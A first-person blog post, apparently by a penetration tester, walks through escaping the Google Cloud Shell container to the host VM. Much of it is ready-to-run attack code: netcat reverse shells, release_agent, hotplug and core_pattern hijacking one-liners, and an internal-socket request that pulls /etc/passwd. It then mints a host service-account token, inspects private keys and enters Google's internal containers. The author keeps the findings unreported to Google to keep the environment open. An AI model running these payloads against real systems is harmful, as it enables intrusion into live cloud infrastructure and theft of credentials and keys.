Google Cloud Shell Container Escape
Cloud Shell Postmortem: In-Depth Analysis of Internal Mechanisms
On a fine late-monsoon weekend morning in India, I was sitting by my window with my laptop in hand, contemplating nature and life at a “multi-threading” level. The next thing I thought of was to hack something (ethically, of course); it’s the second most exciting thing for me! (You can guess the first one. 😄)
Motivated to perform a security analysis, I began recon on one of the hottest companies right now: OpenAI. Anyone who’s worked on it knows they run a massive IT infrastructure with many subdomains for research and model training. While scanning from my laptop, tools like httpx kept dropping connections or terminating scans midway because of my machine’s limited compute/bandwidth. A VPS would have helped, but cost was a blocker.
I started using Google Cloud Shell — a free Linux shell environment from Google Cloud that offers a persistent 5 GB of storage and a stable, high-speed connection. It’s great, but like any free service it has limitations: the default weekly Cloud Shell quota is 50 hours, and once that’s reached you must wait for the quota to reset ¯\_(ツ)_/¯
My initial goal had been to bypass Cloud Shell’s restrictions, but while analysing the environment I realised how complex and extensive Cloud Shell’s configuration and codebase are. It also came to my attention that Google Cloud runs a Vulnerability Rewards Programme (launched roughly a year ago).
So I switched my focus from OpenAI to Google Cloud Shell.
Whenever I come across such a terminal, my ultimate goal is to get a root shell, but here I saw that I already had root access!
Behind Virtual Bars
While running an automated enumeration script (LinEnum) on Google Cloud Shell, a few outputs immediately caught my attention and made me suspicious about the underlying environment.
The /proc/version file showed something unusual: the kernel had been compiled under Chromium OS. However, /etc/os-release still reported the OS as Ubuntu 24.04.3 LTS.
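If you want to reproduce the comparison, the two files can be read directly (the exact output from my session is not reproduced here):

cat /proc/version       # kernel build string references Chromium OS
cat /etc/os-release     # userspace reports Ubuntu 24.04.3 LTS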
This mismatch between the Chromium OS kernel and the Ubuntu userspace is a strong sign of a containerized environment, where the container runs the userland of one OS (Ubuntu) on top of the host kernel of another (ChromeOS).
To confirm my assumption, I ran a few quick checks.
Next, I validated it by inspecting cgroup configurations:
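Checks along these lines surface the cgroup paths (illustrative):

cat /proc/self/cgroup    # cgroup of the current shell
cat /proc/1/cgroup       # cgroup of PID 1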
Both pointed to paths under /k8s.io/..., revealing that the container was being orchestrated through Kubernetes.
Finally, I checked the init process:
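A minimal way to do that:

ps -p 1 -o pid,comm      # shows which program is running as PID 1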
It showed that PID 1 was bash instead of systemd, another indicator of a minimal container environment.
Taken together, these findings confirmed that Google Cloud Shell runs inside a Docker container orchestrated by Kubernetes, rather than a standalone computer/virtual machine.
Escaping the Invisible Cage
As soon as I realized I was trapped inside Docker, my first milestone was simple: escape the container.
Time to test the walls.
While analyzing further, one of the key questions that came to mind was — am I running inside a privileged Docker container? A privileged container runs with almost unrestricted access to the host, including kernel-level operations, device access, and unrestricted mounts.
Privilege Assessment
I began by checking the available capabilities (the set of permissions assigned by the Linux kernel to processes) to detect whether I was inside a privileged container.
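The effective capability mask of the current process can be read straight from procfs (a minimal check):

grep CapEff /proc/self/status
# CapEff: 000001ffffffffff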
The value 000001ffffffffff is a hexadecimal bitmask representing all currently active capabilities. To make sense of it, I decoded it using the capsh utility.
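The decoding step itself is a one-liner:

capsh --decode=000001ffffffffff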
The decoded list clearly shows high-impact capabilities such as:
- cap_sys_admin - allows mounting filesystems and performing administrative operations.
- cap_sys_module - permits loading and unloading kernel modules.
- cap_net_admin - grants network configuration privileges.
The presence of these high-privilege capabilities confirms that the container was launched with the --privileged flag.
My path was clear: take advantage of any of these capabilities to attempt host escape or privilege escalation.
Attack Attempts — Chronology
Attempt #1 — Kernel module (CAP_SYS_MODULE)
First, cap_sys_module caught my attention. I searched for "cap_sys_module escaping container" and found a write-up titled Escaping the Container: Weaponizing Kernel Module Loading via CAP_SYS_MODULE by IBM PTC Security.
I quickly tried the method explained in that blog. First I confirmed that kernel module loading was enabled by checking /proc/sys/kernel/modules_disabled (it was 0). Next, I created a malicious kernel module (hello.c) and a corresponding Makefile inside the container and compiled them to generate a .ko file. I then attempted to load the module onto the host kernel using insmod.
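For reference, the rough shape of that attempt is sketched below. It assumes kernel headers matching the running kernel are available inside the container, and it only shows a skeleton module and the build steps, not the actual payload from the write-up:

cat /proc/sys/kernel/modules_disabled     # 0 means module loading is not globally disabled

# Minimal module skeleton (hello.c)
cat > hello.c << 'EOF'
#include <linux/module.h>
#include <linux/kernel.h>
static int __init hello_init(void) { printk(KERN_INFO "hello from the container\n"); return 0; }
static void __exit hello_exit(void) { printk(KERN_INFO "goodbye\n"); }
module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");
EOF

# Out-of-tree module Makefile (the recipe line must start with a tab)
cat > Makefile << 'EOF'
obj-m += hello.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
EOF

make && sudo insmod hello.ko              # fails here: the host kernel rejects unsigned modules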
The module loading failed because the host kernel has Kernel Module Signature Verification (KMSV) enforced, meaning it will only load modules that are digitally signed with a cryptographic key the host system trusts. Since my compiled module was unsigned, it was immediately rejected. :(
I learnt this the hard way. If you ever encounter such a situation, do not waste time building unsigned modules; instead, inspect the kernel command line for the module.sig_enforce parameter. It is the primary way to check whether module signature enforcement is explicitly set:
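A quick grep against /proc/cmdline does the job:

grep -o 'module\.sig_enforce=[01]' /proc/cmdline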
- If the output includes module.sig_enforce=1 - KMSV is explicitly enabled/enforced.
- If there is no output, or the output includes module.sig_enforce=0 - enforcement is disabled by that parameter.
Attempt #2 — cgroups v1 release_agent (notify_on_release)
I explored other ways to escape a privileged container and came across this post on X/Twitter.
The payload looks wild, right? Let’s understand the logic behind it.
The core technique abuses a legacy cgroups v1 feature called notify_on_release. By enabling this feature in a cgroup hierarchy and setting a release_agent (which points to an attacker-controlled script on the host under the container's filesystem path), an attacker can cause that script to execute as privileged root on the host when the last process in that cgroup exits.
Still confused? Here is a refined, un-obfuscated shell-script version of the same payload with explanations:
# 1. Mount the cgroup filesystem and create a child cgroup 'x'
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# 2. Enable notification on release for the new cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
# 3. Find the container's path on the host, and set it as the release_agent script
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# 4. Create the malicious script (/cmd) in the container's shared filesystem.
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd # The command to run on the host
chmod a+x /cmd
# 5. Execute a process in the cgroup 'x' that immediately exits, triggering the payload
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"When I tried to run this payload in the cloud shell, it failed at the very first step:
The error was self-explanatory. The cgroup hierarchy is already mounted globally at /sys/fs/cgroup, so we cannot mount it again. You can confirm this using the mount command:
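For example (output trimmed and illustrative):

mount | grep cgroup
# cgroup2 on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime)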
From the output you can see it is using cgroup2 — the unified hierarchy.
According to the Linux manual page for cgroups, the release_agent and notify_on_release files are part of cgroups v1 and were removed in cgroups v2. I quickly checked:
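A simple way to verify they are gone (illustrative):

ls /sys/fs/cgroup/ | grep -E 'release_agent|notify_on_release'    # no matches on cgroup v2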
Those files are essential to the exploit, which means this payload is valid only on cgroups v1 systems and will not work on Google Cloud Shell, which uses the cgroups v2 unified hierarchy.
This door no longer exists.
Attempt #3 — Successful escape!
The next morning I woke up with renewed hope. The first two attempts had failed, but they taught me a lot which is the pleasant part of failing, if you ask me.
The fundamental lesson I learned was that containers share the host kernel (unlike VMs that ship a guest kernel on top of a hypervisor). That means any vulnerability in the host kernel can affect every container: a kernel exploit can become a container escape, crossing namespace and capability boundaries to reach the host.
To break out of a Docker container and get code executed on the host you generally need two core elements:
- The payload — a binary or script (for example, a reverse shell) placed inside the container’s filesystem and ready to be executed by the host. You must know the absolute path to that file as seen from the host.
- The flaw (vector) — a kernel vulnerability, misconfiguration or legitimate kernel feature that can be abused so a process inside the container causes the host kernel (or a privileged host process) to execute that payload.
Below I describe two practical methods that I have tried and found successful.
Method #1 — hotplug hijacking
Payload
I created a small reverse-shell script inside the container:
#!/bin/sh
nc -e /bin/bash <CONTAINER_IP> <PORT>

To connect back, you can use nc (netcat) or any alternative reverse-shell mechanism available on the host.
Tip: To find the container IP, use ip a show dev eth0 or hostname -I. If hostname -I prints multiple addresses, the first is usually the container's primary IP.
Saved it as /shell and made it executable (chmod +x /shell).
I started a nc listener in a separate container terminal on the same port so I could receive the incoming connection:
sudo apt install netcat-traditional # if not already installed
nc -lvnp <PORT>

The payload is created inside the container, but we still need the host-side absolute path to that file so the host can execute it. The host kernel or a host process does not see the container’s simple path (for example /shell); it sees the file at the location where the container's root filesystem is mounted on the host.
Container runtimes (Docker, containerd, etc.) use OverlayFS to implement the layered filesystem, meaning the container's writable layer (where /shell lives) is actually a directory on the host that is presented to the container as /. Use the mount output to locate the container's writable layer (upperdir):
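One way to pull the upperdir out of the mount table (the same extraction used by the one-liner later in this post):

mount | grep -m1 upperdir | sed -E 's/.*upperdir=([^,]+).*/\1/'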
Concatenate the host upperdir with the in-container path to get the host-visible absolute path to the payload. Final host path to the payload: /var/lib/containerd/io.containerd.snapshotter.v1.gcfs/snapshotter/snapshots/236/fs/shell
The vector
Linux’s hotplug subsystem executes a helper program specified in /proc/sys/kernel/hotplug whenever a hotplug event occurs (for example, when a new network device appears). By writing the host-visible absolute path of our payload into /proc/sys/kernel/hotplug, the kernel will call that path and run that payload on the next hotplug event.
Write the host path to hotplug:
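Using the host path derived above (same pattern as the one-liner below):

echo '/var/lib/containerd/io.containerd.snapshotter.v1.gcfs/snapshotter/snapshots/236/fs/shell' | sudo tee /proc/sys/kernel/hotplug > /dev/null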
Triggering a hotplug event:
One simple way to trigger a hotplug event is to create a test network device:
ip link add test0 type dummy || ip tuntap add dev test0 mode tun # depending on available drivers
ip link delete test0

Adding and then deleting the device causes the kernel to invoke its hotplug helper, which we hijacked to point at our payload, so the kernel executes it on the host.
Wow!! It worked.
The host replied. Boundary crossed.
To confirm the escape I re-ran the same checks I used at the start of this post. The outputs clearly show I am now executing on the host:
- systemd-detect-virt returning google indicates the environment is a Google machine (host-side), not a container runtime.
- cat /proc/self/cgroup showing 0::/ means the current process is in the root cgroup (no container-specific cgroup entries).
- ps -p 1 showing systemd as PID 1 confirms the system is running the host init (systemd).
I used the commands python3 -c 'import pty, os; pty.spawn("/bin/bash")' and export TERM=xterm-256color to convert the netcat shell into an interactive terminal. This allows features like proper display of colours and formatting in the terminal, thereby improving the overall shell experience.
One-liner payload
Open a terminal window and start a listener using nc -lvnp 9001. Then, in a new terminal window, run the following one-liner payload to receive a root shell connection from the host and escape the container.
echo $'#!/bin/sh\nnc -c /bin/bash '$(hostname -I|awk '{print $1}')' 9001' | sudo tee /shell > /dev/null && sudo chmod +x /shell; echo "$(mount|grep upper|sed -E 's/.*upperdir=([^,]+).*/\1/')/shell" | sudo tee /proc/sys/kernel/hotplug > /dev/null; sudo ip link add test0 type dummy && sudo ip link delete test0

Method #2 — core_pattern hijacking
Idea / vector
/proc/sys/kernel/core_pattern controls what the kernel does when a process crashes and produces a core dump. If the value begins with a pipe character (|), the kernel executes the remainder as a program and streams the raw core bytes to that program's stdin. Crucially, the kernel performs this execve() from the host context (not inside the container), so the handler runs with host-level privileges. That behavior makes core_pattern a powerful vector when a container can write the pattern or point it to an executable the host can run.
Payload
Instead of a file path (of our reverse shell), core_pattern accepts a pipe-handler: a program invocation prefixed with |. The kernel requires the program to be specified by an absolute pathname (for example /usr/bin/nc). In my case I wrote a handler that invoked nc to connect back to my listener:
echo '|/usr/bin/nc -e /bin/sh <CONTAINER_IP> <PORT>' | sudo tee /proc/sys/kernel/core_pattern >/dev/null

Please note: As in Method #1, I placed the /shell script inside the container; in Method #2 you can also reference that same script/payload by its host-side absolute path (under the container's upperdir).
Triggering the crash:
I started a simple process I controlled and crashed it (by sending it a signal whose default action is to dump core, such as SIGSEGV or SIGABRT) so the kernel would invoke the handler:
sleep 9999 &
echo $! > /tmp/sleep.pid
kill -SIGABRT $(cat /tmp/sleep.pid)

Alternatively, you can compile and run a tiny C program that dereferences NULL (segfaults):
gcc -x c -o /tmp/a - <<< 'int main(){volatile int *p=0;*p=1;}' && /tmp/a

When the process crashed, the kernel saw the piped core_pattern, fork()/execve()d the handler on the host, and streamed the core to the handler's stdin. Because my handler was a reverse-shell invocation, the host connected back to my listener and I received a root shell from the node.
One-liner payload
Open a terminal window and start a listener using nc -lvnp 9001. Then, in a new terminal window, run the following one-liner payload to receive a root shell connection from the host and escape the container.
echo "|/usr/bin/nc -e /bin/bash $(hostname -I|awk '{print $1}') 9001" | sudo tee /proc/sys/kernel/core_pattern > /dev/null; (sleep 60 & kill -SIGABRT $!)Fingerprinting the Host
The host was running Container-Optimized OS 117 (Lakitu), a minimal Linux distribution maintained by Google, purpose-built for running Docker and containerd workloads within Google Cloud environments.
On the host system, I observed several containers under the k8s.io namespace:
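On a containerd host they can be enumerated with the ctr client, assuming it is present on the node (the namespace matches the cgroup paths seen earlier):

ctr --namespace k8s.io containers list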
Containers such as metadata-proxy, command-recorder, gateway, client-communication-service, and orchestrator appeared to be GCP Cloud Shell service pods, orchestrated through Kubernetes.
I was able to further review these containers by running commands inside them.
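For example, a shell can be spawned inside a running container with ctr (the container ID below is a placeholder):

ctr -n k8s.io task exec --exec-id debug -t <container-id> /bin/sh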
Also, the directory /var/log/containers/ on the host contained .log files following the standard Kubernetes logging convention (<pod_name>.log).
Next, I inspected temporary files and found two interesting ones inside /tmp:
- /tmp/key1524398165 - contained a private key
- /tmp/cert1424204183 - a certificate issued by Google DevOps
Although I could not determine their exact purpose, they were likely used by Cloud Shell’s backend proxy or gRPC service layer for secure inter-service communication. I decided to revisit this later for deeper investigation.
Another important aspect of Google Cloud Shell is the “Open in Cloud Shell” feature. This feature allows a user to interact with the Cloud Shell environment directly by passing user-supplied values to a set of predefined URL parameters, as documented in the official Google Cloud documentation.
Internally, this functionality is implemented through a shell function named cloudshell_open within the Cloud Shell environment. This is not a standalone binary, but a Linux shell function that ultimately invokes the executable /google/devshell/bin/cloudshell_open_go, passing all user-supplied parameters as command-line arguments.
The cloudshell_open_go binary was a compiled ELF executable, which made static review and analysis difficult.
Interestingly, on the host system, I was able to locate uncompiled Go source code corresponding to this binary. The source files were found within containerd snapshot directories.
This script acts as a local client that communicates with the Google Cloud Shell front-end service over a TCP socket (on localhost:8998). Its primary role is to send structured control messages (length-prefixed, PBLite-formatted JSON messages) to the Cloud Shell UI to trigger actions such as opening files, downloading files, or opening a workspace.
To demonstrate what happens under the hood, I created the following one-liner bash payload, which directly interacts with the same internal socket endpoint, bypassing the wrapper script entirely:
req='[null,null,null,[null,[["/etc/passwd"]]]]'; \
printf "%s\n%s" ${#req} "$req" > /dev/tcp/127.0.0.1/8998Upon execution, the Cloud Shell frontend interprets the message and immediately triggers a download prompt for the /etc/passwd file, as shown below:
Further investigation led me to identify a path traversal vulnerability via symlink bypass, which I documented as a separate report.
My next step was to query the GCE Metadata API. I sent a request to the endpoint: http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
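The metadata server requires the Metadata-Flavor header; a minimal request looks like this:

curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"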
This API is used to retrieve details about the service account linked to the current instance. From within the Docker container, it returned my user email address, whereas from the host, it returned a service account likely associated with the underlying Google Compute Engine (GCE) instance.
I quickly generated an access token for this service account:
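A sketch of that request via the metadata server, assuming the default service-account alias:

ACCESSTOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  | sed -E 's/.*"access_token":"([^"]+)".*/\1/')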
I stored the token in $ACCESSTOKEN, and I validated it through Google APIs to review its associated permissions.
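One way to review the granted scopes is Google's tokeninfo endpoint (illustrative):

curl "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$ACCESSTOKEN"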
Among the permissions, the one that caught my attention was devstorage.read_only.
To explore this further, I needed the current project ID, which could be derived from the subdomain of the service account’s email address. Alternatively, it can also be obtained from the metadata API:
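The same header-authenticated request pattern works here:

curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/project/project-id"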
Using the project ID and the access token, I attempted to list the storage buckets. Unfortunately, the request returned a 403 Forbidden error.
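The attempt looked roughly like this, using the Cloud Storage JSON API (PROJECT_ID is whatever the previous step returned):

curl -H "Authorization: Bearer $ACCESSTOKEN" "https://storage.googleapis.com/storage/v1/b?project=<PROJECT_ID>"
# -> 403 Forbidden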
At this point, I realized I would need to go through the GCE documentation thoroughly to debug the behavior. I decided to postpone that for later and continued my reconnaissance on the host.
I wanted to determine whether the host was running on bare metal or inside a virtual machine. I queried the system’s DMI information:
root@cloudshell-014XXXXa-3f10-4f87-a664-014XXXXXX5ac / # dmidecode -s system-product-name
Google Compute Engine
root@cloudshell-014XXXXa-3f10-4f87-a664-014XXXXXX5ac / #

The output immediately revealed “Google Compute Engine”, a clear indication that the host was running as a GCE virtual machine, not on bare metal.
Next, I inspected kernel logs for signs of virtualization components:
dmesg | grep -iE 'hypervisor|kvm|qemu|vmware|xen'The logs confirmed it beyond doubt:
The kernel had indeed booted under a KVM hypervisor, which is the standard virtualization layer used by Google Cloud for its compute instances.
To further validate this, I listed all attached PCI devices:
lspci | grep -i 'virtual\|virtio\|vmware\|qemu\|xen'

The output displayed several Virtio devices (network, SCSI, RNG, balloon), confirming a paravirtualised setup, typical for KVM/QEMU-based VMs.
Additionally, /proc/cpuinfo included the hypervisor flag, another definitive indicator that the kernel was running inside a virtualised environment:
grep -E 'vmx|svm|hypervisor' /proc/cpuinfo

Collectively, these indicators confirmed that the current session was operating within a Google Compute Engine virtual machine, powered by a KVM-based hypervisor and using Virtio paravirtual devices.
At this stage, it became clear why I couldn’t access any customer-sensitive data or other users’ information. I had successfully uncovered one layer of the Cloud Shell infrastructure, yet remained isolated within the KVM boundary.
Escaped, but not free.
Breaking that isolation would indeed be a major milestone, but it would require much deeper exploration of the environment, extensive study of KVM/Linux internals, and a solid understanding of Google Cloud’s backend architecture.
Considering the length of this post, I decided to conclude here. I hope this walkthrough helped you learn something about the underlying layers of Google Cloud Shell and how to methodically analyze such environments.
I have not reported these findings to Google yet (at the time of writing), as they don’t appear to pose a major security impact, and I prefer to keep the environment intact for further research. Wish me luck — if I discover something more substantial, I’ll share it in the next part of this series! 🥂
Who am I?
I’m Bipin Jitiya, founder of Cuberk Solutions. I expose systems to controlled attacks, like a vaccine, so they can build immunity against hackers and malware.
Cuberk is an information security company focused on helping critical businesses truly understand and secure their IT environments, not just tick compliance checkboxes. We specialize in hands-on vulnerability assessment and penetration testing, with a strong focus on real-world attack scenarios and practical remediation.
If you are curious to know more about what we do, feel free to visit us at www.cuberk.com